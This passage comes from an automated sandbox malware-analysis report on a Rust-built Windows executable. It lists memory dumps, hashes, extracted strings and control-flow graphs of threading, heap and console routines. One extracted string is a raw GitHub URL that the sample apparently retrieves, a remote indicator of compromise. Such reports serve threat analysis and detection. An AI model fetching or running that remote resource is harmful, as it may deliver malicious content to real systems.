                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$size overflows MAX_SIZE$tv
                                            • API String ID: 0-2024914694
                                            • Opcode ID: a53741bf72848248a9a1cebdee88dd65c200b32fa7490253039de3eb16c630c3
                                            • Instruction ID: 5b05dcdd49b2c1827b9261f35d605384439de1e551afde682d732b89f352c09c
                                            • Opcode Fuzzy Hash: a53741bf72848248a9a1cebdee88dd65c200b32fa7490253039de3eb16c630c3
                                            • Instruction Fuzzy Hash: 3A629272A0CBC681EB60CB16E4943EE67A4FB85B84F484175DA8DA3BA9DF3CD545C700
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $*/*$assertion failed: !self.is_polling.swap(true, Ordering::AcqRel)$called `Result::unwrap()` on an `Err` value$utf-8
                                            • API String ID: 0-3347965490
                                            • Opcode ID: cfb31178d679b3061b7eba24d1497f6521ee19885171b1c451629e495ace2c3c
                                            • Instruction ID: 21d5d3f6993885eba6fb5881b36659dacfea87d1bf24c806955c3c435db5edf2
                                            • Opcode Fuzzy Hash: cfb31178d679b3061b7eba24d1497f6521ee19885171b1c451629e495ace2c3c
                                            • Instruction Fuzzy Hash: C4B22722A4CB8281EB50DB25E4A03796BA0FF95B94F4842B1DE5DAB7D9DF3CE451D300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2856 7ff65451da00-7ff65451da29 2857 7ff65451da2b-7ff65451da2e call 7ff654409ca0 2856->2857 2858 7ff65451da33-7ff65451da3a 2856->2858 2857->2858 2860 7ff65451da7d-7ff65451da88 2858->2860 2861 7ff65451da3c-7ff65451da41 2858->2861 2864 7ff65451da9b-7ff65451dad9 2860->2864 2865 7ff65451da8a-7ff65451da97 call 7ff65451e7f0 2860->2865 2862 7ff65451da47-7ff65451da51 2861->2862 2863 7ff65451e288-7ff65451e2a0 call 7ff6543b93d0 2861->2863 2880 7ff65451da53-7ff65451da60 2862->2880 2883 7ff65451e3b5-7ff65451e3c8 2863->2883 2868 7ff65451db1b-7ff65451db29 2864->2868 2869 7ff65451dadb-7ff65451daeb 2864->2869 2865->2864 2870 7ff65451db2f-7ff65451db39 2868->2870 2871 7ff65451e1c3-7ff65451e1cc 2868->2871 2875 7ff65451e266-7ff65451e272 call 7ff6543bf520 2869->2875 2876 7ff65451daf1-7ff65451db01 2869->2876 2877 7ff65451db3f-7ff65451db44 2870->2877 2878 7ff65451e2a5-7ff65451e2bd call 7ff6543b93d0 2870->2878 2881 7ff65451da66-7ff65451da7c 2871->2881 2882 7ff65451e1d2-7ff65451e1e0 call 7ff6544098d0 2871->2882 2875->2883 2876->2871 2884 7ff65451db07-7ff65451db16 call 7ff654408690 2876->2884 2877->2883 2886 7ff65451db4a-7ff65451db8e 2877->2886 2878->2883 2880->2881 2880->2882 2882->2881 2888 7ff65451e5a8-7ff65451e607 call 7ff65451e9a0 2883->2888 2889 7ff65451e3ce-7ff65451e3df HeapFree 2883->2889 2884->2871 2898 7ff65451db96-7ff65451dbc9 2886->2898 2899 7ff65451db90-7ff65451db94 2886->2899 2903 7ff65451e609-7ff65451e60c call 7ff6544098d0 2888->2903 2904 7ff65451e611-7ff65451e61f call 7ff654560750 call 7ff6543bc8c0 2888->2904 2889->2888 2901 7ff65451dbcb-7ff65451dbce 2898->2901 2902 7ff65451dbd5-7ff65451dbd8 2898->2902 2899->2898 2906 7ff65451dbe0-7ff65451dc1c 2901->2906 2907 7ff65451dbd0 2901->2907 2902->2883 2908 7ff65451dbde 2902->2908 2903->2904 2911 7ff65451dc22-7ff65451dc2c 2906->2911 2912 7ff65451dcf5-7ff65451dd03 2906->2912 2907->2883 2908->2906 2913 7ff65451dc36-7ff65451dc59 call 7ff6545129a0 2911->2913 2914 7ff65451dc2e-7ff65451dc31 2911->2914 2916 7ff65451dd1a-7ff65451dd21 2912->2916 2917 7ff65451dd05-7ff65451dd18 call 7ff6544f2910 2912->2917 2928 7ff65451dc66-7ff65451dc8e call 7ff6543ba090 2913->2928 2929 7ff65451dc5b-7ff65451dc61 2913->2929 2914->2912 2921 7ff65451dd40-7ff65451dd4d call 7ff6543bde40 2916->2921 2922 7ff65451dd23-7ff65451dd26 2916->2922 2930 7ff65451dd99-7ff65451dda0 2917->2930 2933 7ff65451dd5a-7ff65451dd5d 2921->2933 2925 7ff65451dd28-7ff65451dd2a 2922->2925 2926 7ff65451dd4f-7ff65451dd53 2922->2926 2931 7ff65451dd2c-7ff65451dd31 2925->2931 2926->2933 2947 7ff65451dc97-7ff65451dcc1 call 7ff6543bf280 2928->2947 2948 7ff65451dc90-7ff65451dc95 2928->2948 2936 7ff65451dce9-7ff65451dcee 2929->2936 2930->2883 2938 7ff65451dda6-7ff65451dde4 call 7ff6545160d0 2930->2938 2939 7ff65451dd33-7ff65451dd39 2931->2939 2940 7ff65451dd55 2931->2940 2934 7ff65451e378-7ff65451e3b0 call 7ff6543bb190 2933->2934 2935 7ff65451dd63-7ff65451dd94 call 7ff6543b59d0 call 7ff6544f2910 2933->2935 2934->2883 2935->2930 2936->2912 2952 7ff65451ddea-7ff65451de11 2938->2952 2953 7ff65451e2c2-7ff65451e2d6 call 7ff6543b5820 2938->2953 2939->2931 2945 7ff65451dd3b-7ff65451dd3e 2939->2945 2940->2933 2945->2933 2951 7ff65451dccb-7ff65451dcce 2947->2951 2963 7ff65451dcc3 2947->2963 2948->2951 2958 7ff65451dce6 2951->2958 2959 7ff65451dcd0-7ff65451dce1 HeapFree 2951->2959 2952->2883 2956 7ff65451de17-7ff65451de20 2952->2956 2953->2883 2961 7ff65451de22-7ff65451de31 call 7ff654514610 2956->2961 2962 7ff65451de55-7ff65451de64 2956->2962 2958->2936 2959->2958 2974 7ff65451de37-7ff65451de44 2961->2974 2975 7ff65451e342-7ff65451e36b call 7ff6543bb190 2961->2975 2964 7ff65451de66-7ff65451de75 call 7ff654514610 2962->2964 2965 7ff65451de91-7ff65451ded4 2962->2965 2963->2951 2978 7ff65451de7b-7ff65451de84 2964->2978 2979 7ff65451e303-7ff65451e306 2964->2979 2968 7ff65451ded6-7ff65451dedb 2965->2968 2969 7ff65451dee1-7ff65451def7 call 7ff6545160d0 2965->2969 2968->2969 2972 7ff65451e36d-7ff65451e376 call 7ff6544f6570 2968->2972 2988 7ff65451e2db-7ff65451e2ea call 7ff6543b5820 2969->2988 2989 7ff65451defd-7ff65451df4c call 7ff6545160d0 2969->2989 2972->2883 2974->2962 2981 7ff65451de46-7ff65451de4b 2974->2981 2975->2883 2978->2965 2985 7ff65451de86-7ff65451de8a 2978->2985 2986 7ff65451e317-7ff65451e340 call 7ff6543bb190 2979->2986 2987 7ff65451e308-7ff65451e30d 2979->2987 2981->2883 2982 7ff65451de51-7ff65451de53 2981->2982 2982->2964 2985->2965 2991 7ff65451de8c call 7ff65451e8d0 2985->2991 2986->2883 2987->2986 2992 7ff65451e30f-7ff65451e312 call 7ff654514780 2987->2992 2988->2883 3000 7ff65451e2ef-7ff65451e2fe call 7ff6543b5820 2989->3000 3001 7ff65451df52-7ff65451df8b CreateThread 2989->3001 2991->2965 2992->2986 3000->2883 3002 7ff65451e10f-7ff65451e124 3001->3002 3003 7ff65451df91-7ff65451dfb2 3001->3003 3013 7ff65451e126-7ff65451e12c 3002->3013 3014 7ff65451e143-7ff65451e15d HeapFree GetLastError 3002->3014 3005 7ff65451e277-7ff65451e283 call 7ff6543bf520 3003->3005 3006 7ff65451dfb8-7ff65451dfe3 call 7ff65451ea30 3003->3006 3005->2883 3015 7ff65451dfe5-7ff65451dfef call 7ff65451ebb0 3006->3015 3016 7ff65451dff4-7ff65451e020 3006->3016 3017 7ff65451e12e 3013->3017 3018 7ff65451e132-7ff65451e13e HeapFree 3013->3018 3019 7ff65451e16d-7ff65451e179 3014->3019 3020 7ff65451e15f-7ff65451e16a call 7ff65451c250 3014->3020 3015->3016 3024 7ff65451e023-7ff65451e039 3016->3024 3017->3018 3018->3014 3021 7ff65451e189-7ff65451e1a4 call 7ff6543c9800 3019->3021 3022 7ff65451e17b-7ff65451e186 call 7ff65441c470 3019->3022 3020->3019 3034 7ff65451e1a6-7ff65451e1b3 3021->3034 3035 7ff65451e1e5 3021->3035 3022->3021 3028 7ff65451e040-7ff65451e044 3024->3028 3032 7ff65451e046-7ff65451e06d 3028->3032 3033 7ff65451e071-7ff65451e07b 3028->3033 3032->3028 3036 7ff65451e06f-7ff65451e0f7 3032->3036 3037 7ff65451e097-7ff65451e0a1 3033->3037 3038 7ff65451e07d-7ff65451e094 3033->3038 3034->2880 3041 7ff65451e1b9-7ff65451e1be call 7ff65451b3e0 3034->3041 3040 7ff65451e1ed-7ff65451e1f5 3035->3040 3036->2871 3045 7ff65451e0fd-7ff65451e10a call 7ff65451c0f0 3036->3045 3039 7ff65451e0a7-7ff65451e0b2 3037->3039 3037->3040 3038->3037 3039->3024 3043 7ff65451e1f7-7ff65451e205 3040->3043 3044 7ff65451e20a-7ff65451e25b 3040->3044 3041->2871 3043->3044 3044->2881 3047 7ff65451e261 3044->3047 3045->2871 3047->2882
                                            APIs
                                            Strings
                                            • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF65451E288
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF65451E323, 00007FF65451E34E
                                            • thread name may not contain interior null bytes, xrefs: 00007FF65451E398
                                            • RUST_MIN_STACK()/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\core\src\num\mod.rs, xrefs: 00007FF65451DC36
                                            • assertion failed: shared.shutdown_tx.is_some(), xrefs: 00007FF65451E2A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$CreateErrorLastThread
                                            • String ID: RUST_MIN_STACK()/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\core\src\num\mod.rs$assertion failed: prev.ref_count() >= 1$assertion failed: shared.shutdown_tx.is_some()$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$thread name may not contain interior null bytes
                                            • API String ID: 1443094557-2080857320
                                            • Opcode ID: 0f0abef1e3911c9ca5922881495d0eecafd652bff9b28001ed8a27ed38dc702e
                                            • Instruction ID: f4ee56b84dfcbf590a1d9bb0c2e025157b8f5cca5a6fbf7380ff59e8fef02737
                                            • Opcode Fuzzy Hash: 0f0abef1e3911c9ca5922881495d0eecafd652bff9b28001ed8a27ed38dc702e
                                            • Instruction Fuzzy Hash: EF42D332A0DB8281EA659F25E4A03BA67A0FF85780F5855B5DECEA3795DF3CE055C300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3050 7ff6544f32c0-7ff6544f32d8 3051 7ff6544f3311-7ff6544f3315 3050->3051 3052 7ff6544f32da-7ff6544f32f3 call 7ff65456029c 3050->3052 3054 7ff6544f3321-7ff6544f332e 3051->3054 3056 7ff6544f32f5-7ff6544f32f9 3052->3056 3057 7ff6544f3317 3052->3057 3058 7ff6544f332f-7ff6544f3344 call 7ff654560224 3056->3058 3059 7ff6544f32fb-7ff6544f330f GetLastError 3056->3059 3057->3054 3062 7ff6544f3405-7ff6544f344b call 7ff6545601c4 3058->3062 3063 7ff6544f334a-7ff6544f3351 3058->3063 3059->3054 3073 7ff6544f344d-7ff6544f3462 WaitForSingleObject 3062->3073 3074 7ff6544f3468-7ff6544f346a 3062->3074 3065 7ff6544f3477-7ff6544f3499 call 7ff6543ba090 3063->3065 3066 7ff6544f3357-7ff6544f335a 3063->3066 3077 7ff6544f34ea-7ff6544f34ee 3065->3077 3078 7ff6544f349b-7ff6544f34a2 3065->3078 3069 7ff6544f3535-7ff6544f3562 call 7ff6543b8690 3066->3069 3070 7ff6544f3360-7ff6544f336e 3066->3070 3079 7ff6544f3567-7ff6544f35b4 call 7ff6544f2ec0 call 7ff6544f2f40 3069->3079 3075 7ff6544f3374-7ff6544f3394 3070->3075 3076 7ff6544f34ce-7ff6544f34d9 3070->3076 3073->3074 3073->3079 3080 7ff6544f34de-7ff6544f34e0 RtlNtStatusToDosError 3074->3080 3081 7ff6544f346c-7ff6544f3472 3074->3081 3082 7ff6544f339a-7ff6544f33a0 3075->3082 3083 7ff6544f3518-7ff6544f351f 3075->3083 3076->3054 3089 7ff6544f34f2-7ff6544f34f5 call 7ff6544f3670 3077->3089 3086 7ff6544f34a4-7ff6544f34a7 3078->3086 3087 7ff6544f34ff-7ff6544f3510 3078->3087 3084 7ff6544f35b6-7ff6544f35c8 call 7ff6543b9060 3079->3084 3080->3077 3081->3054 3082->3084 3085 7ff6544f33a6-7ff6544f33bb call 7ff6543ba090 3082->3085 3083->3054 3093 7ff6544f35cd-7ff6544f35dd call 7ff6543b9060 3084->3093 3090 7ff6544f3524-7ff6544f3530 3085->3090 3103 7ff6544f33c1-7ff6544f33d0 3085->3103 3086->3093 3094 7ff6544f34ad-7ff6544f34be call 7ff6543ba090 3086->3094 3087->3090 3091 7ff6544f3512-7ff6544f3514 3087->3091 3102 7ff6544f34fa 3089->3102 3090->3054 3091->3083 3106 7ff6544f35e2-7ff6544f360c call 7ff6543bb190 3093->3106 3094->3106 3109 7ff6544f34c4-7ff6544f34cc 3094->3109 3102->3054 3107 7ff6544f3611-7ff6544f362b call 7ff6544f3900 3103->3107 3108 7ff6544f33d6-7ff6544f33e4 call 7ff6544f3670 3103->3108 3106->3107 3113 7ff6544f3630-7ff6544f3676 call 7ff6544f3900 CloseHandle call 7ff654560750 3107->3113 3108->3054 3116 7ff6544f33ea-7ff6544f33f5 3108->3116 3109->3089 3121 7ff6544f3680-7ff6544f3698 3113->3121 3122 7ff6544f367b call 7ff6545600b0 3113->3122 3116->3113 3118 7ff6544f33fb-7ff6544f3400 3116->3118 3118->3054 3123 7ff6544f369f-7ff6544f36ab 3121->3123 3124 7ff6544f369a-7ff6544f369d 3121->3124 3122->3121 3125 7ff6544f36dc-7ff6544f3704 MultiByteToWideChar 3123->3125 3126 7ff6544f36ad-7ff6544f36b9 3123->3126 3124->3125 3127 7ff6544f370a-7ff6544f3712 3125->3127 3128 7ff6544f387b-7ff6544f38b7 call 7ff6543b8690 3125->3128 3126->3125 3129 7ff6544f36bb-7ff6544f36d6 3126->3129 3131 7ff6544f38bc-7ff6544f38cb call 7ff6543b9060 3127->3131 3132 7ff6544f3718-7ff6544f3743 WriteConsoleW 3127->3132 3128->3131 3129->3125 3133 7ff6544f38e2-7ff6544f38ff call 7ff6543bd420 3129->3133 3138 7ff6544f38d0-7ff6544f38dd call 7ff6543b9060 3131->3138 3136 7ff6544f383e-7ff6544f3852 GetLastError 3132->3136 3137 7ff6544f3749-7ff6544f3752 3132->3137 3140 7ff6544f3858-7ff6544f3868 3136->3140 3141 7ff6544f3758 3137->3141 3142 7ff6544f3856 3137->3142 3138->3133 3144 7ff6544f375e-7ff6544f3770 3141->3144 3145 7ff6544f3869-7ff6544f3876 call 7ff6543b8700 3141->3145 3142->3140 3147 7ff6544f3772-7ff6544f37aa WriteConsoleW 3144->3147 3148 7ff6544f37d7-7ff6544f37da 3144->3148 3145->3128 3147->3148 3149 7ff6544f37ac-7ff6544f37d2 GetLastError call 7ff6544f2f60 3147->3149 3148->3138 3150 7ff6544f37e0-7ff6544f37e3 3148->3150 3149->3148 3152 7ff6544f3854 3150->3152 3153 7ff6544f37e5-7ff6544f37ec 3150->3153 3152->3142 3154 7ff6544f37fc-7ff6544f380c 3153->3154 3155 7ff6544f37f0-7ff6544f37fa 3154->3155 3156 7ff6544f380e-7ff6544f381e 3154->3156 3155->3142 3155->3154 3156->3155 3157 7ff6544f3820-7ff6544f383c 3156->3157 3157->3155
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Error$Last$ConsoleWrite$ByteCharCloseHandleMultiObjectSingleStatusWaitWide
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1644806672-2333694755
                                            • Opcode ID: f74af3b99e2db63fd8153670236585d3f8eb6bcb015b97b8b09344f676863e12
                                            • Instruction ID: 3026a8915098663fa4031e7b42bb909f5e6b9356daf405dc1c24401f3c207a0d
                                            • Opcode Fuzzy Hash: f74af3b99e2db63fd8153670236585d3f8eb6bcb015b97b8b09344f676863e12
                                            • Instruction Fuzzy Hash: 40F1D162E49A9259FB20DB61D8A03FC27A1EB44798F4C4171EA4DA7BD9DF3CE185C300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3158 7ff65452b460-7ff65452b47d 3159 7ff65452b70a-7ff65452b720 call 7ff6545160d0 3158->3159 3160 7ff65452b483-7ff65452b49d CreateIoCompletionPort 3158->3160 3167 7ff65452b726-7ff65452b747 3159->3167 3168 7ff65452badc-7ff65452bae6 call 7ff6543b5820 3159->3168 3161 7ff65452b762-7ff65452b772 GetLastError 3160->3161 3162 7ff65452b4a3-7ff65452b4bc call 7ff6545160d0 3160->3162 3164 7ff65452b844-7ff65452b84f 3161->3164 3173 7ff65452baa6-7ff65452bab5 call 7ff6543b5820 3162->3173 3174 7ff65452b4c2-7ff65452b4d9 3162->3174 3170 7ff65452ba92-7ff65452baa5 3164->3170 3171 7ff65452b74d-7ff65452b75d 3167->3171 3172 7ff65452bb1f-7ff65452bb76 HeapFree 3167->3172 3180 7ff65452baeb-7ff65452bafa call 7ff6543b57c0 3168->3180 3176 7ff65452b854-7ff65452b8d7 3171->3176 3186 7ff65452bb78-7ff65452bb80 call 7ff6543eea80 3172->3186 3187 7ff65452bb85-7ff65452bb89 3172->3187 3173->3172 3174->3172 3178 7ff65452b4df-7ff65452b564 call 7ff6545160d0 3174->3178 3184 7ff65452b8dd-7ff65452b8fd call 7ff6544f6600 call 7ff6545160d0 3176->3184 3185 7ff65452b9bb-7ff65452b9c0 3176->3185 3198 7ff65452bab7-7ff65452bac9 call 7ff6543b5820 3178->3198 3199 7ff65452b56a-7ff65452b5be 3178->3199 3180->3172 3184->3180 3211 7ff65452b903-7ff65452b9b9 memset * 5 3184->3211 3189 7ff65452b9c6-7ff65452ba8c 3185->3189 3186->3187 3193 7ff65452bb8b-7ff65452bb8e call 7ff65439a9a0 3187->3193 3194 7ff65452bb93-7ff65452bb96 3187->3194 3189->3170 3193->3194 3196 7ff65452bb98-7ff65452bba4 3194->3196 3197 7ff65452bbcf-7ff65452bbe7 call 7ff654560750 call 7ff6543bc8c0 * 3 3194->3197 3196->3197 3201 7ff65452bba6-7ff65452bbb3 call 7ff6543eea80 3196->3201 3198->3172 3199->3172 3204 7ff65452b5c4-7ff65452b5c8 3199->3204 3201->3197 3204->3172 3209 7ff65452b5ce-7ff65452b5d9 3204->3209 3214 7ff65452b777-7ff65452b77d 3209->3214 3215 7ff65452b5df-7ff65452b5e6 3209->3215 3211->3189 3216 7ff65452b783-7ff65452b7c0 call 7ff6545160d0 3214->3216 3218 7ff65452bafc-7ff65452bb01 call 7ff6543b57e0 3215->3218 3219 7ff65452b5ec-7ff65452b5ff call 7ff6545160d0 3215->3219 3230 7ff65452b7c6-7ff65452b7f7 3216->3230 3231 7ff65452bacb-7ff65452bada call 7ff6543b57c0 3216->3231 3218->3172 3224 7ff65452b604-7ff65452b607 3219->3224 3228 7ff65452b60d-7ff65452b617 3224->3228 3229 7ff65452bb03-7ff65452bb10 call 7ff6543b57c0 3224->3229 3233 7ff65452b61d-7ff65452b631 3228->3233 3234 7ff65452b6d5-7ff65452b6fa call 7ff6545160d0 3228->3234 3229->3172 3230->3164 3236 7ff65452b7f9-7ff65452b842 3230->3236 3231->3172 3239 7ff65452b6b7-7ff65452b6ba 3233->3239 3240 7ff65452b637-7ff65452b641 3233->3240 3249 7ff65452b700-7ff65452b708 3234->3249 3250 7ff65452bb12-7ff65452bb1a call 7ff6543b57c0 3234->3250 3236->3164 3236->3176 3239->3234 3245 7ff65452b6bc-7ff65452b6bf 3239->3245 3244 7ff65452b650-7ff65452b6b2 3240->3244 3244->3244 3247 7ff65452b6b4 3244->3247 3248 7ff65452b6c0-7ff65452b6d3 3245->3248 3247->3239 3248->3234 3248->3248 3249->3216 3250->3172
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memset$CompletionCreateErrorFreeHeapLastPort
                                            • String ID:
                                            • API String ID: 3630304894-0
                                            • Opcode ID: a4213aa4a4f56e89231fbc641cd2a73d7bddc25c0c614568561bb8f82914d416
                                            • Instruction ID: becae1bc59ff69099e4978da70fc8794f6e49544637bc0f6223d9a545d6f3e0b
                                            • Opcode Fuzzy Hash: a4213aa4a4f56e89231fbc641cd2a73d7bddc25c0c614568561bb8f82914d416
                                            • Instruction Fuzzy Hash: 4312BE22D1CBC182F3618B25E8553BA67A0FB95348F189265DFCD626A6EF7CE1C5C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3252 7ff654391180-7ff6543911ac 3253 7ff654391450-7ff654391453 GetStartupInfoA 3252->3253 3254 7ff6543911b2-7ff6543911cf 3252->3254 3258 7ff654391460-7ff654391478 call 7ff654560a58 3253->3258 3255 7ff6543911e9-7ff6543911f4 3254->3255 3256 7ff6543911f6-7ff654391204 3255->3256 3257 7ff6543911d8-7ff6543911db 3255->3257 3261 7ff654391407-7ff654391416 call 7ff654560a50 3256->3261 3262 7ff65439120a-7ff65439120e 3256->3262 3259 7ff6543913f0-7ff654391401 3257->3259 3260 7ff6543911e1-7ff6543911e6 Sleep 3257->3260 3259->3261 3259->3262 3260->3255 3269 7ff654391229-7ff65439122b 3261->3269 3270 7ff65439141c-7ff654391437 _initterm 3261->3270 3265 7ff654391480-7ff654391499 call 7ff654560a60 3262->3265 3266 7ff654391214-7ff654391223 3262->3266 3278 7ff65439149e 3265->3278 3266->3269 3266->3270 3272 7ff654391231-7ff65439123e 3269->3272 3273 7ff65439143d-7ff654391442 3269->3273 3270->3272 3270->3273 3275 7ff654391240-7ff654391248 3272->3275 3276 7ff65439124c-7ff654391294 call 7ff654561a70 SetUnhandledExceptionFilter call 7ff654560a30 call 7ff654561880 call 7ff654560a10 3272->3276 3273->3272 3275->3276 3291 7ff6543912b2-7ff6543912b8 3276->3291 3292 7ff654391296 3276->3292 3280 7ff6543914a6-7ff6543914a8 call 7ff654560a78 3278->3280 3285 7ff6543914ad-7ff6543914cc call 7ff654391180 3280->3285 3294 7ff6543912a0-7ff6543912a2 3291->3294 3295 7ff6543912ba-7ff6543912c8 3291->3295 3293 7ff6543912f0-7ff6543912f6 3292->3293 3296 7ff65439130e-7ff654391333 malloc 3293->3296 3297 7ff6543912f8-7ff654391302 3293->3297 3298 7ff6543912a4-7ff6543912a7 3294->3298 3299 7ff6543912e9 3294->3299 3300 7ff6543912ae 3295->3300 3296->3278 3303 7ff654391339-7ff65439133f 3296->3303 3301 7ff6543913e0-7ff6543913e5 3297->3301 3302 7ff654391308 3297->3302 3304 7ff6543912d0-7ff6543912d2 3298->3304 3305 7ff6543912a9 3298->3305 3299->3293 3300->3291 3301->3302 3302->3296 3306 7ff654391340-7ff654391370 strlen malloc memcpy 3303->3306 3304->3299 3307 7ff6543912d4 3304->3307 3305->3300 3306->3306 3308 7ff654391372-7ff6543913a9 call 7ff654561680 call 7ff6543b52d0 3306->3308 3309 7ff6543912d8-7ff6543912e2 3307->3309 3314 7ff6543913ae-7ff6543913bc 3308->3314 3309->3299 3311 7ff6543912e4-7ff6543912e7 3309->3311 3311->3299 3311->3309 3314->3280 3315 7ff6543913c2-7ff6543913ca 3314->3315 3315->3258 3316 7ff6543913d0-7ff6543913dd 3315->3316
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
